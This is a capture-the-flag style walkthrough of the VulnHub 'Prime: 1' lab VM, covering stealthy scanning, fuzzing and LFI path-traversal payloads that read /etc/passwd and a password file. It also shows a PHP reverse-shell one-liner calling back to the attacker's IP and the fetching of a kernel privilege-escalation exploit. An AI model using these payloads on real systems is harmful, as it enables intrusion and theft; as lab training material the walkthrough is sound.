Target VM: Prime: 1 ~ VulnHub
Prerequisites
OpenSSL
OpenSSL provides many encryption algorithms and protocols. Encrypting or decrypting typically needs a key (KEY) in hexadecimal, the plaintext to encrypt, the cipher to use, and optionally an initialization vector (IV) and an encoding step such as Base64.
Encryption template
echo -n "[string]" | openssl enc -[cipher] -K [hex KEY] -iv [hex IV] -base64
Decryption template
echo -n "[encrypted string]" | openssl enc -d -[cipher] -K [hex KEY] -iv [hex IV] -base64
Option reference
- enc: the symmetric encryption subcommand (add -d to decrypt).
- -[cipher]: replace with the cipher to use, e.g. aes-256-cbc, aes-128-cbc, des.
- -K [hex KEY]: replace with the key in hexadecimal, e.g. 0123456789abcdef0123456789abcdef (32 hex characters = 16 bytes; AES-256 needs 64 hex characters).
- -iv [hex IV]: replace with the initialization vector in hexadecimal, e.g. abcdef9876543210 (16 hex characters = 8 bytes, one DES block; AES needs 32 hex characters).
In the OpenSSL help output, the Message Digest commands are hash algorithms and the Cipher commands are the symmetric ciphers that enc accepts:
┌──(root㉿Kali)-[~/nmapscan]
└─# openssl --help
help:
Standard commands
asn1parse ca ciphers cmp
cms crl crl2pkcs7 dgst
dhparam dsa dsaparam ec
ecparam enc engine errstr
fipsinstall gendsa genpkey genrsa
help info kdf list
mac nseq ocsp passwd
pkcs12 pkcs7 pkcs8 pkey
pkeyparam pkeyutl prime rand
rehash req rsa rsautl
s_client s_server s_time sess_id
smime speed spkac srp
storeutl ts verify version
x509
Message Digest commands (see the `dgst' command for more details)
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
Cipher commands (see the `enc' command for more details)
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstd
od
od (octal dump) is a command-line tool on Linux and Unix that displays file contents in octal, hexadecimal or other formats. It is mostly used to inspect binary files, to analyse a file's structure or to debug programs.
Base conversion examples
Convert a string to octal
Convert a string to binary
- -A: format of the output addresses: n (no addresses), o (octal), x (hexadecimal), d (decimal), etc.
- -t: output format, one of:
- o: octal
- x: hexadecimal
- d: decimal
- c: characters
- s: strings
- f: floating point
- -N: number of bytes to read.
- -v: show all output, including repeated lines.
- -h: human-readable output.
Nmap scan
When scanning ports, do not start with version detection or other deep scans; the aim is to avoid being noticed by the server firewall or the administrator. Once the open ports are known, scan them in detail. Ports first, then services, keeps the number of packets sent down. Also scan UDP ports and run the vulnerability scripts so that nothing is missed while staying unobtrusive. If IPv4 offers too few attack vectors, try scanning over IPv6.
1. Host discovery
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap -sn 192.168.248.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 17:18 CST
Nmap scan report for 192.168.248.1 (192.168.248.1)
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.248.2 (192.168.248.2)
Host is up (0.000082s latency).
MAC Address: 00:50:56:F1:23:CB (VMware)
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.000096s latency).
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Nmap scan report for 192.168.248.254 (192.168.248.254)
Host is up (0.000089s latency).
MAC Address: 00:50:56:EE:EA:C4 (VMware)
Nmap scan report for 192.168.248.131 (192.168.248.131)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.93 seconds
The target IP is 192.168.248.134.
2. Port scan
Scan all TCP ports with --min-rate 10000
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap --min-rate 10000 -p- 192.168.248.134 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 17:50 CST
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.00086s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
Scan the UDP ports
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap -sU --min-rate 10000 -p- 192.168.248.134 -oA udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 17:51 CST
Warning: 192.168.248.134 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.00092s latency).
All 65535 scanned ports on 192.168.248.134 (192.168.248.134) are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 72.98 seconds
3. Service scan
Use a TCP connect scan against the ports found above to identify service versions and the server operating system
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap -sT -sV -O -p22,80 192.168.248.134 -oA detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 18:22 CST
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.63 seconds
Scan with the vulnerability scripts
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap -sT --script=vuln -p22,80 192.168.248.134 -oA vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 17:58 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.0017s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /wordpress/: Blog
|_ /wordpress/wp-login.php: WordPress login page.
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 344.97 seconds
Result analysis
Port 22: OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Port 80: Apache httpd 2.4.18 ((Ubuntu))
Web penetration
Directory brute-forcing
┌──(root㉿Kali)-[~/nmapscan]
└─# dirb http://192.168.248.134/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Dec 18 17:58:48 2024
URL_BASE: http://192.168.248.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.248.134/ ----
+ http://192.168.248.134/dev (CODE:200|SIZE:131)
+ http://192.168.248.134/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.248.134/javascript/
+ http://192.168.248.134/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.248.134/wordpress/
---- Entering directory: http://192.168.248.134/javascript/ ----
==> DIRECTORY: http://192.168.248.134/javascript/jquery/
---- Entering directory: http://192.168.248.134/wordpress/ ----
+ http://192.168.248.134/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-content/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-includes/
+ http://192.168.248.134/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.248.134/javascript/jquery/ ----
+ http://192.168.248.134/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/ ----
+ http://192.168.248.134/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/includes/
+ http://192.168.248.134/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/user/
---- Entering directory: http://192.168.248.134/wordpress/wp-content/ ----
+ http://192.168.248.134/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.248.134/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.248.134/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/network/ ----
+ http://192.168.248.134/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.248.134/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/user/ ----
+ http://192.168.248.134/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.248.134/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.248.134/wordpress/wp-content/plugins/ ----
+ http://192.168.248.134/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.248.134/wordpress/wp-content/themes/ ----
+ http://192.168.248.134/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.248.134/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Dec 18 17:59:17 2024
DOWNLOADED: 46120 - FOUND: 15
Visit http://192.168.248.134/dev
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.
Visit http://192.168.248.134/ and view the page source; nothing useful there:
<img src="hacknpentest.png" alt="hnp security" width="1300" height="595">
Visit http://192.168.248.134/wordpress/. Clicking through a few posts reveals the username victor, which may be useful for brute-force testing later.
Following the hint on /dev, dig deeper with fuzzing scans.
Fuzzing scans
Scan for zip and txt files: a WordPress site's own files are all php or html, so this surfaces any other files.
┌──(root㉿Kali)-[~/nmapscan]
└─# dirb http://192.168.248.134/ -X .zip,.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Dec 18 18:38:26 2024
URL_BASE: http://192.168.248.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.248.134/ ----
+ http://192.168.248.134/secret.txt (CODE:200|SIZE:412)
-----------------
END_TIME: Wed Dec 18 18:38:32 2024
DOWNLOADED: 9224 - FOUND: 1
Visit http://192.168.248.134/secret.txt
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//
Following the hint, scan for php files
┌──(root㉿Kali)-[~/nmapscan]
└─# dirb http://192.168.248.134 -X .php -o report/dirbphp.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: report/dirbphp.txt
START_TIME: Wed Dec 18 18:46:54 2024
URL_BASE: http://192.168.248.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.248.134/ ----
+ http://192.168.248.134/image.php (CODE:200|SIZE:147)
+ http://192.168.248.134/index.php (CODE:200|SIZE:136)
-----------------
END_TIME: Wed Dec 18 18:46:57 2024
DOWNLOADED: 4612 - FOUND: 2
Fuzz the discovered pages for parameter names
┌──(root㉿Kali)-[~/nmapscan]
└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.248.134/index.php?FUZZ=something
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.248.134/index.php?FUZZ=something
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000341: 200 7 L 19 W 206 Ch "file"
Total time: 0.688222
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 1381.820
Visit http://192.168.248.134/index.php?file
<html><head><title>HacknPentest</title>
</head><body>
<img src="hacknpentest.png" alt="hnp security" width="1300" height="595">
Do something better <br><br><br><br><br><br>you are digging wrong file
</body></html>
Following the hint, visit http://192.168.248.134/index.php?file=location.txt
Do something better
ok well Now you reah at the exact parameter
Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun.
Following the hint, fuzz the value of that parameter
┌──(root㉿Kali)-[~/nmapscan]
└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 17 http://192.168.248.134/image.php?secrettier360=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.248.134/image.php?secrettier360=FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000257: 200 13 L 43 W 328 Ch "dev"
Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0
Visit http://192.168.248.134/image.php?secrettier360=dev
finaly you got the right parameter
hello, now you are at level 0 stage. In real life pentesting we should use our tools to dig on a web very hard. Happy hacking.
The page included the dev file, so image.php has an arbitrary file read (local file inclusion) vulnerability.
Exploitation
Use the vulnerability to read `/etc/passwd`
┌──(root㉿Kali)-[~/nmapscan]
└─# curl http://192.168.248.134/image.php?secrettier360=../../../../../../../../etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>
Extract the accounts with a bash login shell, plus the entry carrying a hint:
root:x:0:0:root:/root:/bin/bash
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
Use the vulnerability to read saket's password file /home/saket/password.txt
┌──(root㉿Kali)-[~/nmapscan]
└─# curl http://192.168.248.134/image.php?secrettier360=../../../../../../../../home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>
follow_the_ippsec
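A defender's view of the two requests above, as an added Python example that is not part of the original write-up: it parses Apache combined-format access log lines (constructed here to mirror the requests on this page), flags query parameters whose decoded value contains traversal sequences or well-known sensitive targets, and shows a hardened include-path check that an image.php-style page should apply instead of including the raw parameter.

```python
import re
from pathlib import Path
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines modelled on the requests in this write-up.
SAMPLE_LOG = """\
192.168.248.131 - - [18/Dec/2024:18:50:01 +0800] "GET /image.php?secrettier360=dev HTTP/1.1" 200 328 "-" "curl/8.9.1"
192.168.248.131 - - [18/Dec/2024:18:51:12 +0800] "GET /image.php?secrettier360=../../../../../../../../etc/passwd HTTP/1.1" 200 2107 "-" "curl/8.9.1"
192.168.248.131 - - [18/Dec/2024:18:52:40 +0800] "GET /image.php?secrettier360=..%2F..%2F..%2Fhome%2Fsaket%2Fpassword.txt HTTP/1.1" 200 345 "-" "curl/8.9.1"
192.168.248.131 - - [18/Dec/2024:18:53:03 +0800] "GET /index.php?file=location.txt HTTP/1.1" 200 206 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# "../" and "..\" sequences, and file targets that a web page has no business serving.
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\)")
SENSITIVE_RE = re.compile(r"/etc/(passwd|shadow)|/home/[^/]+/|/proc/self|php://|/var/log/")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded %252e%252e%2f is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lfi_attempts(log_text: str) -> list:
    """Return (ip, status, parameter, decoded value) for every query parameter
    whose decoded value looks like path traversal or a sensitive file target."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for param, raw in parse_qsl(query, keep_blank_values=True):
            value = decode_fully(raw)
            if TRAVERSAL_RE.search(value) or SENSITIVE_RE.search(value):
                findings.append((m["ip"], int(m["status"]), param, value))
    return findings


def safe_include_path(base_dir: str, requested: str, allowed) -> Optional[Path]:
    """Hardened counterpart of including $_GET['secrettier360'] directly:
    accept only an allow-listed name, then verify that the resolved path is
    still inside base_dir, so "../" can never escape the include directory."""
    if requested not in allowed:
        return None
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    if base not in candidate.parents:
        return None
    return candidate
```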
Try logging in over SSH
┌──(root㉿Kali)-[~/nmapscan]
└─# ssh saket@192.168.248.134
The authenticity of host '192.168.248.134 (192.168.248.134)' can't be established.
ED25519 key fingerprint is SHA256:j4BjjDNA4iDRgwl0m3uHtlNdQm8M97LMWuNBsgHbxt0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.248.134' (ED25519) to the list of known hosts.
saket@192.168.248.134's password:
Permission denied, please try again.
saket@192.168.248.134's password:
Permission denied, please try again.
saket@192.168.248.134's password:
Login failed
Getting into the admin panel
Try the WordPress admin login at http://192.168.248.134/wordpress/wp-admin/ with the user victor found while enumerating the site earlier.
Username `victor`, password `follow_the_ippsec`: login successful.
Upload point: the theme editor at http://192.168.248.134/wordpress/wp-admin/theme-editor.php?file=secret.php&theme=twentynineteen
Use a PHP one-liner to get a reverse shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.248.131/443 0>&1'"); ?>
With a listener running on Kali, visit http://192.168.248.134/wordpress/wp-content/themes/twentynineteen/secret.php
┌──(root㉿Kali)-[~/nmapscan]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.248.131] from (UNKNOWN) [192.168.248.134] 51734
bash: cannot set terminal process group (1422): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ whoami
<ml/wordpress/wp-content/themes/twentynineteen$ whoami
www-data
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ ls
ls
404.php
archive.php
classes
comments.php
fonts
footer.php
functions.php
header.php
image.php
inc
index.php
js
package-lock.json
package.json
page.php
postcss.config.js
print.css
print.scss
readme.txt
sass
screenshot.png
search.php
secret.php
single.php
style-editor-customizer.css
style-editor-customizer.scss
style-editor.css
style-editor.scss
style-rtl.css
style.css
style.scss
template-parts
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ uname -a
<ml/wordpress/wp-content/themes/twentynineteen$ uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$
From this information there are two privilege-escalation routes:
The first: the target's kernel is old, so a kernel exploit.
The second: the hint `/home/saket/enc`, the OpenSSL decryption route.
Kernel exploits are generally not recommended: they can crash system services and get the administrator's attention.
Kernel exploit
Search for exploits matching the kernel version
┌──(root㉿Kali)-[~/nmapscan]
└─# searchsploit Linux ubuntu 4.10.0-28
---------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿Kali)-[~/nmapscan]
└─# searchsploit Linux ubuntu 4.10.0-28 -m linux/local/45010.c
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
Exploit: Sun SUNWlldap Library Hostname - Local Buffer Overflow
URL: https://www.exploit-db.com/exploits/4
Path: /usr/share/exploitdb/exploits/solaris/local/4.c
Codes: OSVDB-15148, CVE-2003-1055
Verified: True
File Type: C source, ASCII text
Copied to: /root/nmapscan/4.c
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /root/nmapscan/45010.c
View the exploit source
┌──(root㉿Kali)-[~/nmapscan]
└─# cat 45010.c
/*
Credit @bleidl, this is a slight modification to his original POC
https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
For details on how the exploit works, please visit
https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Tested on Ubuntu 16.04 with the following Kernels
4.4.0-31-generic
4.4.0-62-generic
4.4.0-81-generic
4.4.0-116-generic
4.8.0-58-generic
4.10.0.42-generic
4.13.0-21-generic
Tested on Fedora 27
4.13.9-300
gcc cve-2017-16995.c -o cve-2017-16995
internet@client:~/cve-2017-16995$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880038c3f500
[*] Leaking sock struct from ffff88003af5e180
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880038704600
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880038704600
[*] credentials patched, launching shell...
#id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
*/
Start an HTTP server on Kali to transfer the exploit
┌──(root㉿Kali)-[~/nmapscan]
└─# php -S 0:80
[Wed Dec 18 22:12:26 2024] PHP 8.2.21 Development Server (http://0:80) started
Download the exploit, compile it and run it
www-data@ubuntu:/home$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.248.131/45010
wget http://192.168.248.131/45010
--2024-12-18 06:14:11-- http://192.168.248.131/45010
Connecting to 192.168.248.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21616 (21K)
Saving to: '45010'
0K .......... .......... . 100% 138M=0s
2024-12-18 06:14:11 (138 MB/s) - '45010' saved [21616/21616]
www-data@ubuntu:/tmp$ ls
ls
45010
VMwareDnD
